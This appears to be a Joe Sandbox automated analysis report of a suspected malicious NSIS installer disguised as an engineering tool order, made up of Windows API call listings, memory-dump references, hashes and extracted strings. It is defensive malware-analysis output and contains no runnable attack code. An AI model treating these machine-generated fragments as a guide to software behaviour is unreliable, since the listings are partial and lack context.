                                                                                                                                                                                                                            • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                                                                                                                                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1507773811.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507731690.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507814859.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507849586.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3730416702-0
                                                                                                                                                                                                                          • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                                                                                                                                                          • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1507773811.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507731690.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507814859.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507849586.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                                          • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                                                                                                                                          • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047FC
                                                                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404804
                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 0040481E
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404830
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404856
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                                          • Opcode ID: 31ce9a4f4114cdac1c56cc6e6a7041e0723a6b64a621d03b111e890c65b63bdb
                                                                                                                                                                                                                          • Instruction ID: 4b27695e280e242887da12c7cc5754773637cab379b52992c14d440b6ab19931
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31ce9a4f4114cdac1c56cc6e6a7041e0723a6b64a621d03b111e890c65b63bdb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C018C76D00218BADB00EB94DC81BEFBBBCAB55711F10412BBA10B62C0C2B4A9018BA5
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402B9A
                                                                                                                                                                                                                          • MulDiv.KERNEL32(000B785F,00000064,000B7863), ref: 00402BC5
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00402BD5
                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 00402BCF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401D3B
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0040A808), ref: 00401DB3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                          • String ID: Times New Roman
                                                                                                                                                                                                                          • API String ID: 3808545654-927190056
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Hil Setup: Installing,Hil Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045F2,000000DF,00000000,00000400,?), ref: 00404775
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 0040477D
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,Hil Setup: Installing), ref: 00404790
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                          • String ID: %u.%u%s%s$Hil Setup: Installing
                                                                                                                                                                                                                          • API String ID: 3540041739-4180361894
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                                                                                                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowTextA.USER32(00000000,00422F20), ref: 004039DA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: TextWindow
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"$1033$Hil Setup: Installing
                                                                                                                                                                                                                          • API String ID: 530164218-1801705394
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030C6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405775
                                                                                                                                                                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030C6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 0040577E
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00409014), ref: 0040578F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040576F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                          • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CharNextA.USER32(?,?,Unconsiderately97.gra,?,00405874,Unconsiderately97.gra,Unconsiderately97.gra,766B3410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405816
                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 0040581B
                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 0040582F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                                                                          • String ID: Unconsiderately97.gra
                                                                                                                                                                                                                          • API String ID: 3213498283-3192565651
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,00402DE2,?), ref: 00402C15
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402C33
                                                                                                                                                                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00404EB9
                                                                                                                                                                                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00404F0A
                                                                                                                                                                                                                            • Part of subcall function 00403F2E: SendMessageA.USER32(0001043A,00000000,00000000,00000000), ref: 00403F40
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421528,Error launching installer), ref: 004054B7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004054C4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Error launching installer, xrefs: 004054A1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,766B3410,00000000,C:\Users\user\AppData\Local\Temp\,004035C0,004033DA,?), ref: 00403602
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(0051BBC8), ref: 00403609
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004035E8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,80000000,00000003), ref: 004057BC
                                                                                                                                                                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,80000000,00000003), ref: 004057CA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                          • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1507773811.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1507731690.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1507814859.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1507849586.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E5
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004058FD
                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040590E
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 190613189-0

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:9%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                          Signature Coverage:29.4%
                                                                                                                                                                                                                          Total number of Nodes:51
                                                                                                                                                                                                                          Total number of Limit Nodes:6

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217
                                                                                                                                                                                                                          • Opcode ID: d7ba9baf1f7c1999a5a0f67a834470c7cbac01a31748942cb5529b77fab4eb4a
                                                                                                                                                                                                                          • Instruction ID: 0f7beb62483143d55fb8d06dae6a53251b41f42326aca7846935482215e33b0f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7ba9baf1f7c1999a5a0f67a834470c7cbac01a31748942cb5529b77fab4eb4a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB81D474E40218DFDB18DFA9C894ADDBBF2BF89310F248069E409AB365DB349981CF50

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217
                                                                                                                                                                                                                          • Opcode ID: a79109f40b59f8b366e4f55786f111a01af4acc1c32c2e19414b32e963f2b4c4
                                                                                                                                                                                                                          • Instruction ID: 01230a47186b280d7b7a42a0d1c7b379f5474aa60cad4a9ba1f16ff9cc0826e5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a79109f40b59f8b366e4f55786f111a01af4acc1c32c2e19414b32e963f2b4c4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B481B274E002189FDB18DFA9D894BDDBBF2BF89310F248069E409AB365DB349981CF50

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          Strings
